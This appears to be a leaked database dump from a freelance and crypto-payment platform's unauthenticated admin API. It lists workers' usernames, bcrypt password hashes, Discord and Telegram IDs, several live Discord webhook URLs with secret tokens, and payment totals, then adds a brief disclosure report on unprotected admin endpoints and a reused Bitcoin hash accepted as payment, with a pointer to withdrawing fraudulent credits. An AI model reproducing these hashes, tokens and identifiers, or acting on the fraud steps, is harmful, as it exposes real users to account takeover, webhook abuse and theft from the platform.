"_id": "67a0c4af4686719e87e5318d",
"username": "marcosmith13",
"email": "[email protected]",
"password_hash": "$2a$10$ff1mwvm1VYfNeNqcPGsFC.rds3hCey.a3DAKPXF0KSE4wDXlq/U/C",
"role": "worker",
"credits": 0.0,
"payment_count": 0.0,
"total_paid": 0.0,
"discord_id": "613200790978428931",
"telegram_id": null,
"webhook_url": null,
"user_id": "67a0c4af4686719e87e5318d",
"subroles": [
"design"
],
"registration_date": "2025-03-23T19:32:23.359Z",
"referral_code": null,
"referral_earnings": 0.0,
"discord_username": "marcosmith13",
"transaction_count": 13.0
},
{
"_id": "67a0c59c4686719e87e531bc",
"username": "volume",
"email": "[email protected]",
"password_hash": "$2a$10$QM/xuOKvt7nBTlZ8sSE9NuiEsvv8zi0M8gljn.zIOMXnw2uFfugiy",
"role": "worker",
"credits": 0.0,
"payment_count": 0.0,
"total_paid": 0.0,
"discord_id": null,
"telegram_id": "https://discord.com/api/webhoo...",
"webhook_url": "https://discord.com/api/webhooks/1343475256941215795/Lrb7ZzUmhclVPJfXxiWtjTX8z8pG-lGio_B0i1gHTG8Wmr5_fSPXEukV_i5VvmQNUCVA",
"user_id": "67a0c59c4686719e87e531bc",
"subroles": [
"design",
"coding",
"website-development"
],
"registration_date": "2025-02-25T14:15:03.253Z",
"referral_code": null,
"referral_earnings": 0.0,
"transaction_count": 2.0
},
{
"_id": "67a0cfb12d53a9df940b28c0",
"username": "nymph",
"email": "[email protected]",
"password_hash": "$2a$10$/Z7BTIx6MHvlr7CnKp3qAOamkqaoWx7jlx1wbLJ4pskzC/5AKkRqO",
"role": "worker",
"credits": 0.0,
"payment_count": 0.0,
"total_paid": 0.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "67a0cfb12d53a9df940b28c0",
"subroles": [
"design"
],
"registration_date": "2025-02-15T11:14:47.401Z",
"referral_code": null,
"referral_earnings": 0.0
},
{
"_id": "67a0d3f62d53a9df940b3174",
"username": "trix",
"email": "[email protected]",
"password_hash": "$2a$10$Bkz9Tm0In0.rOyPOn2S/2.Q95Q0MVC2vkiairwNeOcq5UyJsUyIc2",
"role": "worker",
"credits": 0.0,
"payment_count": 0.0,
"total_paid": 0.0,
"discord_id": null,
"telegram_id": "https://discord.com/api/webhoo...",
"webhook_url": "https://discord.com/api/webhooks/1420396533622247455/edD0a1AjUiAOODZFeoLEx93xLXUXWkS320gcNhCjwMdhVWaLzZ-XTfXSl97u1WDcPanZ",
"user_id": "67a0d3f62d53a9df940b3174",
"subroles": [
"design",
"coding",
"website-development",
"discord-setups"
],
"registration_date": "2025-08-11T05:13:17.742Z",
"referral_code": null,
"referral_earnings": 0.0,
"transaction_count": 2.0
},
{
"_id": "67a0d6242d53a9df940b34f5",
"username": "prince",
"email": "[email protected]",
"password_hash": "$2a$10$XvbfUaZHcjegSTRE09.l/uymTHTiXFFaZVL8DLMSIEB8deTfwnUcC",
"role": "worker",
"credits": 0.0,
"payment_count": 0.0,
"total_paid": 0.0,
"discord_id": "1277287815578648649",
"telegram_id": "https://discord.com/api/webhoo...",
"webhook_url": "https://discord.com/api/webhooks/1340386506497458347/-QS2W9g_raje3a4fPVeRYwKOBrDUxOj1AVajCSRB36WRFj2D5Zxp7Iyy2ikT8AK7ukBf",
"user_id": "67a0d6242d53a9df940b34f5",
"subroles": [
"design",
"coding",
"website-development"
],
"registration_date": "2025-02-23T13:35:44.497Z",
"referral_code": null,
"referral_earnings": 0.0,
"discord_username": ".lucifergfxx",
"transaction_count": 10.0
},
{
"_id": "67a0e6992d53a9df940c95d8",
"username": "singularity",
"email": "[email protected]",
"password_hash": "$2a$10$N5KIUGDeyD5o0JsFzM8/F.WdaJFoHKWFpdIoonaDvE98LsCiz1cUO",
"role": "worker",
"credits": 0.0,
"payment_count": 0.0,
"total_paid": 0.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "67a0e6992d53a9df940c95d8",
"subroles": [
"coding",
"discord-setups",
"website-development"
],
"registration_date": "2025-03-31T01:13:18.570Z",
"referral_code": null,
"referral_earnings": 0.0
},
{
"_id": "67a471fdaac7b55cf630fa3a",
"username": "devlujia",
"email": "[email protected]",
"password_hash": "$2a$10$HVc0qywjjL44AYs27g68q.TD24Yn8GlhPqX9ycBN1br7GDVIsgszG",
"role": "worker",
"credits": 0.0,
"payment_count": 0.0,
"total_paid": 0.0,
"discord_id": "1135540329345470554",
"telegram_id": "6926408721",
"webhook_url": null,
"user_id": "67a471fdaac7b55cf630fa3a",
"subroles": [
"support",
"design",
"coding",
"website-development",
"discord-setups",
"google-sheets"
],
"registration_date": "2025-11-02T17:05:25.958Z",
"referral_code": null,
"referral_earnings": 0.0,
"discord_username": "uixlujiaaa",
"telegram_username": "uixLujiaaa",
"telegram_name": "Lujia"
},
{
"_id": "67a4bc89aac7b55cf632319c",
"username": "winterworker",
"email": "[email protected]",
"password_hash": "$2a$10$MxlBl/dJjeoS9YeiVjMAo.oIcjZgjGtB4e5MuS1NVE39ADC31mZPe",
"role": "worker",
"credits": 0.0,
"payment_count": 0.0,
"total_paid": 0.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "67a4bc89aac7b55cf632319c",
"subroles": [
"support",
"design",
"coding"
],
"registration_date": "2025-11-02T17:05:25.958Z",
"referral_code": null,
"referral_earnings": 0.0
},
{
"_id": "67a739171404db589329377b",
"username": "salesgod",
"email": "[email protected]",
"password_hash": "$2a$10$PGTwRQJy1W2X4HBFHWwE7uBxV2XJAXB3ArlasbuKEoC3ahwYlmlay",
"role": "worker",
"credits": 0.0,
"payment_count": 0.0,
"total_paid": 0.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "67a739171404db589329377b",
"subroles": [
"design"
],
"registration_date": "2025-11-02T17:05:25.958Z",
"referral_code": null,
"referral_earnings": 0.0
},
{
"_id": "67aac5451404db589331029d",
"username": "heart",
"email": "[email protected]",
"password_hash": "$2a$10$Y/LDZG6Wn3k8ixFLvQ0Xh.BZjc5i/7KWZXtZIaccAZpdl.mxVflau",
"role": "worker",
"credits": 0.0,
"payment_count": 0.0,
"total_paid": 0.0,
"discord_id": "1043509028237619201",
"telegram_id": null,
"webhook_url": null,
"user_id": "67aac5451404db589331029d",
"subroles": [
"coding",
"website-development",
"discord-setups",
"design"
],
"registration_date": "2025-03-04T02:17:07.551Z",
"referral_code": null,
"referral_earnings": 0.0,
"discord_username": "puso0"
},
{
"_id": "67ae01185de10962fc7b772b",
"username": "ketchup",
"email": "[email protected]",
"password_hash": "$2a$10$t6shGA7Kj6TFDqQ1sXusbun6Of7kn0rtbfmx/19ArUbRVxpHQjmMW",
"role": "worker",
"credits": 0.0,
"payment_count": 0.0,
"total_paid": 0.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "67ae01185de10962fc7b772b",
"subroles": [
"website-development",
"coding"
],
"registration_date": "2025-11-02T17:05:25.958Z",
"referral_code": null,
"referral_earnings": 0.0,
"transaction_count": 1.0
},
{
"_id": "67af89d771d0a7300ca71efe",
"username": "tor",
"email": "[email protected]",
"password_hash": "$2a$10$G9bHUH4ZlgH7azMwRf9MwupaSdKTMvYm0IolKDrXQQ/QKi36WSWsC",
"role": "worker",
"credits": 0.0,
"payment_count": 0.0,
"total_paid": 0.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "67af89d771d0a7300ca71efe",
"subroles": [
"coding",
"website-development"
],
"registration_date": "2025-02-14T18:22:15.219Z",
"referral_code": "tor",
"referral_earnings": 0.0
},
{
"_id": "67b1e9b8ba297a0a5f965001",
"username": "heh",
"email": "[email protected]",
"password_hash": "$2a$10$36T8xzRQeXLds1TwlXCx2OfbDPTHp/w1TWu5BH9iLmPAKR/dIcMEy",
"role": "worker",
"credits": 0.0,
"payment_count": 0.0,
"total_paid": 0.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "67b1e9b8ba297a0a5f965001",
"subroles": [
"coding"
],
"registration_date": "2025-02-16T13:35:52.376Z",
"referral_code": "heh",
"referral_earnings": 0.0
},
{
"_id": "67d1a9a5014ba6aee940308c",
"username": "ghostfx69",
"email": "[email protected]",
"password_hash": "$2a$10$rUMAU56/DpiGevCZIywjSekDOqWCz1henI9dsCMnvU6edC.e..lCC",
"role": "worker",
"credits": 0.0,
"payment_count": 0.0,
"total_paid": 0.0,
"discord_id": "1198176604174692472",
"telegram_id": "1109313940",
"webhook_url": null,
"user_id": "67d1a9a5014ba6aee940308c",
"subroles": [
"design",
"discord-setups",
"google-sheets"
],
"registration_date": "2025-03-12T15:35:01.802Z",
"referral_code": "ghostfx69",
"referral_earnings": 0.0,
"discord_username": "ghostfx6969",
"telegram_username": "tgrontop",
"telegram_name": "GHOST",
"transaction_count": 3.0
},
{
"_id": "67d20db6014ba6aee942d7f0",
"username": "jstonedev",
"email": "[email protected]",
"password_hash": "$2a$10$hy9qOK/K0bTySGtmb5r5uOIsXueV35Ie4gX5Qyb7bYS/ooKYKAiti",
"role": "worker",
"credits": 0.0,
"payment_count": 0.0,
"total_paid": 0.0,
"discord_id": "5827103652",
"telegram_id": "5827103652",
"webhook_url": "https://discord.com/api/webhooks/1349852233373712495/iIR6StFL4tOm9sSUgHL85hCym6G6Gr6V25UqitoBtIVA04JFv9BU6Or69zGPXl6Ll13P",
"user_id": "67d20db6014ba6aee942d7f0",
"subroles": [
"website-development",
"coding",
"design"
],
"registration_date": "2025-03-12T22:41:58.586Z",
"referral_code": "jstonedev",
"referral_earnings": 0.0,
"telegram_username": "jStoneDev",
"telegram_name": "jStone"
},
{
"_id": "67e9791c9ef244ff59195f49",
"username": "psyche",
"email": "[email protected]",
"password_hash": "$2a$10$..fn0UmhjA4.NRSLsb8myOKapcGk5.5cq3/1HdAc7stZkug76WEAC",
"role": "worker",
"credits": 0.0,
"payment_count": 0.0,
"total_paid": 0.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "67e9791c9ef244ff59195f49",
"subroles": [
"design"
],
"registration_date": "2025-03-30T17:02:20.309Z",
"referral_code": "psyche",
"referral_earnings": 0.0
},
{
"_id": "68106d25368ea255e91b2445",
"username": "killua",
"email": "[email protected]",
"password_hash": "$2a$10$iJWT9hY6rcewgMVYhJqtNuvFrRhS5hQSY1rr17dcpqmcIPGJfKQxi",
"role": "worker",
"credits": 0.0,
"payment_count": 0.0,
"total_paid": 0.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "68106d25368ea255e91b2445",
"subroles": [
"design",
"coding",
"website-development",
"discord-setups",
"google-sheets"
],
"registration_date": "2025-04-29T06:09:41.358Z",
"referral_code": "killua",
"referral_earnings": 0.0
},
{
"_id": "6810d515368ea255e91fb3f2",
"username": "ace",
"email": "[email protected]",
"password_hash": "$2a$10$eUKh79Z3uv33fuDP3zMC6.GwthMHCTjL5JS34ZO/ppplsTVYPYOH6",
"role": "worker",
"credits": 0.0,
"payment_count": 0.0,
"total_paid": 0.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "6810d515368ea255e91fb3f2",
"subroles": [
"coding",
"website-development",
"discord-setups",
"design"
],
"registration_date": "2025-04-29T13:33:09.029Z",
"referral_code": "ace",
"referral_earnings": 0.0
},
{
"_id": "6823462f368ea255e9b2e860",
"username": "jrendev",
"email": "[email protected]",
"password_hash": "$2a$10$E4QO/Uwkkg2Xwu3TvKi.iujwH02CKqRZnOrjVCXGK.89tmDkx25mO",
"role": "worker",
"credits": 0.0,
"payment_count": 0.0,
"total_paid": 0.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "6823462f368ea255e9b2e860",
"subroles": [
"design",
"coding",
"website-development",
"discord-setups"
],
"registration_date": "2025-05-13T13:16:31.831Z",
"referral_code": "jrendev",
"referral_earnings": 0.0
},
{
"_id": "6880422b368ea255e9a42943",
"username": "aristaeus_art",
"email": "[email protected]",
"password_hash": "$2a$10$SKjmXrbrqO5ZermAVRUJ4eZkPJJPMZbNEWChwcEkjN4HkjBqKRGwa",
"role": "worker",
"credits": 0.0,
"payment_count": 0.0,
"total_paid": 0.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "6880422b368ea255e9a42943",
"subroles": [
"support",
"design",
"coding",
"website-development",
"discord-setups",
"google-sheets"
],
"registration_date": "2025-07-23T02:00:11.482Z",
"referral_code": "aristaeus_art",
"referral_earnings": 0.0
},
{
"_id": "6880c952368ea255e9a72c74",
"username": "cazudev",
"email": "[email protected]",
"password_hash": "$2a$10$VOFW4r/OqPBY2qmdV.UEnOrNO.7aAr1QwCse368.yKmoq88.21n2y",
"role": "worker",
"credits": 0.0,
"payment_count": 0.0,
"total_paid": 0.0,
"discord_id": "853280557609648169",
"telegram_id": null,
"webhook_url": null,
"user_id": "6880c952368ea255e9a72c74",
"subroles": [
"design",
"coding",
"website-development",
"discord-setups",
"google-sheets"
],
"registration_date": "2025-07-23T11:36:50.022Z",
"referral_code": "cazudev",
"referral_earnings": 0.0,
"discord_username": "cazudev"
},
{
"_id": "68832120368ea255e9aba4df",
"username": "roli_pro",
"email": "[email protected]",
"password_hash": "$2a$10$UgJfgEf5d8ckK15S/r8d5ucipl0AafGPiB854vrNJIYWw5wnapbna",
"role": "worker",
"credits": 0.0,
"payment_count": 0.0,
"total_paid": 0.0,
"discord_id": "1367878495127998577",
"telegram_id": null,
"webhook_url": null,
"user_id": "68832120368ea255e9aba4df",
"subroles": [
"design",
"website-development"
],
"registration_date": "2025-07-25T06:16:00.682Z",
"referral_code": "roli_pro",
"referral_earnings": 0.0,
"discord_username": "roli_pro2"
},
{
"_id": "689ca1b5368ea255e91be4f8",
"username": "cris.dev",
"email": "[email protected]",
"password_hash": "$2a$10$gzENTu8YvvAK7csrmNfaIOf...",
"role": "worker",
"credits": 0.0,
"payment_count": 0,
"total_paid": 0.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null
},
{
"_id": "689ca65d368ea255e91d15ce",
"username": "cris_dev",
"email": "[email protected]",
"password_hash": "$2a$10$ASwzlXvdGnDyiNmApPkBC./eQveacjr9AL5lBMWKXwfbK.cYMEdNa",
"role": "worker",
"credits": 0.0,
"payment_count": 0.0,
"total_paid": 0.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "689ca65d368ea255e91d15ce",
"subroles": [
"design",
"coding",
"website-development",
"discord-setups"
],
"registration_date": "2025-08-13T14:51:09.634Z",
"referral_code": "cris_dev",
"referral_earnings": 0.0
},
{
"_id": "68a3381d368ea255e935c914",
"username": "matic",
"email": "[email protected]",
"password_hash": "$2a$10$z2SlICp7ZVjOGmmCdFl0xOPl.LJHEUjJrZlz0sYQH3WKGL2TUza8q",
"role": "worker",
"credits": 0.0,
"payment_count": 0.0,
"total_paid": 0.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "68a3381d368ea255e935c914",
"subroles": [
"coding",
"website-development"
],
"registration_date": "2025-08-18T14:26:37.678Z",
"referral_code": "matic",
"referral_earnings": 0.0
},
{
"_id": "68d5f071e87c75e4f150aa39",
"username": "pwn.code",
"email": "[email protected]",
"password_hash": "$2a$10$jYhgoCyEFLkiOlYHNeOSOuE...",
"role": "worker",
"credits": 0.0,
"payment_count": 0,
"total_paid": 0.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null
},
{
"_id": "68ff2adcdf38d72a1d9b6fde",
"username": "bobthebuilder",
"email": "[email protected]",
"password_hash": "$2a$10$rCrCDHewgMLA00pOQvfW9OrBVyrOHuBmv4Yd7B/CLVf4vb76qwjTe",
"role": "worker",
"credits": 0.0,
"payment_count": 0.0,
"total_paid": 0.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "68ff2adcdf38d72a1d9b6fde",
"subroles": [
"coding",
"website-development"
],
"registration_date": "2025-10-27T08:18:36.800Z",
"referral_code": "bobthebuilder",
"referral_earnings": 0.0
},
{
"_id": "69019886df38d72a1db32969",
"username": "artisan",
"email": "[email protected]",
"password_hash": "$2a$10$NNz.WfUFoSEyp4JvaWddZeikGm2AIEtkcKil4AOAYRAYeFl1Zvo6u",
"role": "worker",
"credits": 0.0,
"payment_count": 0.0,
"total_paid": 0.0,
"discord_id": "762324323012575284",
"telegram_id": "7620419153",
"webhook_url": null,
"user_id": "69019886df38d72a1db32969",
"subroles": [
"design",
"coding",
"website-development"
],
"registration_date": "2025-10-29T04:31:02.335Z",
"referral_code": "artisan",
"referral_earnings": 0.0,
"discord_username": "titan00953",
"telegram_username": "artisan226",
"telegram_name": "Artisan"
}
],
"payments": [],
"leaderboard": [
{
"rank": 1,
"username": "slater",
"credits": 50.0,
"status": "offline"
},
{
"rank": 2,
"username": "nuke",
"credits": 17.0,
"status": "offline"
},
{
"rank": 3,
"username": "garen1773",
"credits": 16.4,
"status": "offline"
}
]
},
"currency_breakdown": [
{
"currency": "LTC",
"amount": 29202.55
},
{
"currency": "USDT",
"amount": 4480.21
},
{
"currency": "ETH",
"amount": 1247.0
},
{
"currency": "SOL",
"amount": 1080.63
},
{
"currency": "BTC",
"amount": 780.0
},
{
"currency": "btc",
"amount": 714.66
},
{
"currency": "BNB",
"amount": 626.0
},
{
"currency": "sol",
"amount": 620.0
},
{
"currency": "eth",
"amount": 602.37
},
{
"currency": "USDC",
"amount": 415.0
},
{
"currency": "xrp",
"amount": 270.0
},
{
"currency": "usdc",
"amount": 190.0
},
{
"currency": "ltc",
"amount": 156.29
},
{
"currency": "xmr",
"amount": 155.0
},
{
"currency": "tusdtrc20",
"amount": 120.0
},
{
"currency": "usdterc20",
"amount": 105.0
},
{
"currency": "usdtbsc",
"amount": 103.09
},
{
"currency": "usdttrc20",
"amount": 85.0
},
{
"currency": "XRP",
"amount": 36.75
},
{
"currency": "trx",
"amount": 3.0
}
],
"payments_by_status": {
"completed": {
"count": 57,
"amount": 10119.11
},
"failed": {
"count": 41,
"amount": 28393.57
},
"pending": {
"count": 30,
"amount": 2479.87
}
},
"payments_by_currency": {
"COMPLETED": {
"count": 57,
"amount": 10119.11
},
"FAILED": {
"count": 41,
"amount": 28393.57
},
"PENDING": {
"count": 30,
"amount": 2479.87
},
"BNB": {
"count": 5,
"amount": 626.0
},
"BTC": {
"count": 16,
"amount": 714.66
},
"ETH": {
"count": 5,
"amount": 602.37
},
"LTC": {
"count": 2,
"amount": 156.29
},
"SOL": {
"count": 2,
"amount": 620.0
},
"USDC": {
"count": 3,
"amount": 190.0
},
"USDT": {
"count": 9,
"amount": 4480.21
},
"XRP": {
"count": 6,
"amount": 270.0
},
"TRX": {
"count": 1,
"amount": 3.0
},
"TUSDTRC20": {
"count": 1,
"amount": 120.0
},
"USDTBSC": {
"count": 1,
"amount": 103.09
},
"USDTERC20": {
"count": 1,
"amount": 105.0
},
"USDTTRC20": {
"count": 1,
"amount": 85.0
},
"XMR": {
"count": 1,
"amount": 155.0
}
},
"top_users_by_payment": [
{
"username": "customertest",
"email": "[email protected]",
"payment_count": 12,
"total_paid": 212.0,
"user_id": "67ff5e8c9ef244ff59ce2830"
},
{
"username": "Winter",
"email": "[email protected]",
"payment_count": 11,
"total_paid": 438.54,
"user_id": "67a0be31facae7004ec1094c"
},
{
"username": "ghalepaiin",
"email": "[email protected]",
"payment_count": 7,
"total_paid": 350.0,
"user_id": "67a66d3fe6797eea520c0830"
},
{
"username": "gr88pe",
"email": "[email protected]",
"payment_count": 5,
"total_paid": 469.0,
"user_id": "68775503368ea255e9905853"
},
{
"username": "px01z",
"email": "[email protected]",
"payment_count": 4,
"total_paid": 807.0,
"user_id": "68f7af27df38d72a1d776516"
},
{
"username": "kadev",
"email": "[email protected]",
"payment_count": 4,
"total_paid": 310.0,
"user_id": "67ab038e5de10962fc77cf35"
},
{
"username": "halo06",
"email": "[email protected]",
"payment_count": 4,
"total_paid": 655.0,
"user_id": "67d57c257e983b3c0adc2e0b"
},
{
"username": "vintage",
"email": "[email protected]",
"payment_count": 3,
"total_paid": 382.65,
"user_id": "68f3aa4edf38d72a1d689669"
},
{
"username": "the_one",
"email": "[email protected]",
"payment_count": 3,
"total_paid": 171.0,
"user_id": "68608633368ea255e917f5ce"
},
{
"username": "diddler",
"email": "[email protected]",
"payment_count": 3,
"total_paid": 61.0,
"user_id": "6837c933368ea255e950e4e6"
}
],
"webhooks": []
}## 🛡️SPECIFIC SECURITY FAILURES
### Authentication System
- **Claim:** Multi-factor authentication
- **Reality:** No authentication on critical admin endpoints
- **Evidence:** `/api/admin/*` endpoints return 200 OK unauthenticated
### Fraud Protection
- **Claim:** Real-time fraud protection
- **Reality:** Payment system accepts any valid Bitcoin transaction hash
- **Evidence:** Reused hash `1ef675816d9888d053bc627be4de1f700622d93c07e27bcaa61b713ab444b2ee` marked as completed
### Data Protection
- **Claim:** Encrypted communications
- **Reality:** Complete database exposure via unauthenticated API calls
- **Evidence:** All user data, payment history, and worker credentials accessible
## 🔧 TECHNICAL DETAILS
**Infrastructure:** Cloudflare CDN (172.67.145.243)
**Database:** MongoDB (ObjectID structure confirmed)
**Authentication:** JWT HS256 tokens
**Vulnerable Endpoints:**
- `/api/payments/check` - Payment validation
- `/api/admin/payments` - Payment database
- `/api/admin/workers` - Worker accounts
- `/api/withdrawals/request` - Withdrawal processing
## ABOUT THIS ASSESSMENT
**Conducted by:** Greedi → Portfolio
**Methodology:** penetration testing using Burp Suite, directory enumeration, manual vulnerability testing
**Focus:** IDOR, SQL injection, CSRF, XSS, payment callback manipulation, authentication bypass
## 📋 EVIDENCE
Full technical report available with:
- API request/response captures
- Vulnerability reproduction steps
- Timeline of exploitation
- ↓Submit withdrawal request with fraudulent credits↓
*This assessment was conducted ethically and reported to the platform before public disclosure.* (decided not to pay $350 for these vulns lmfao)
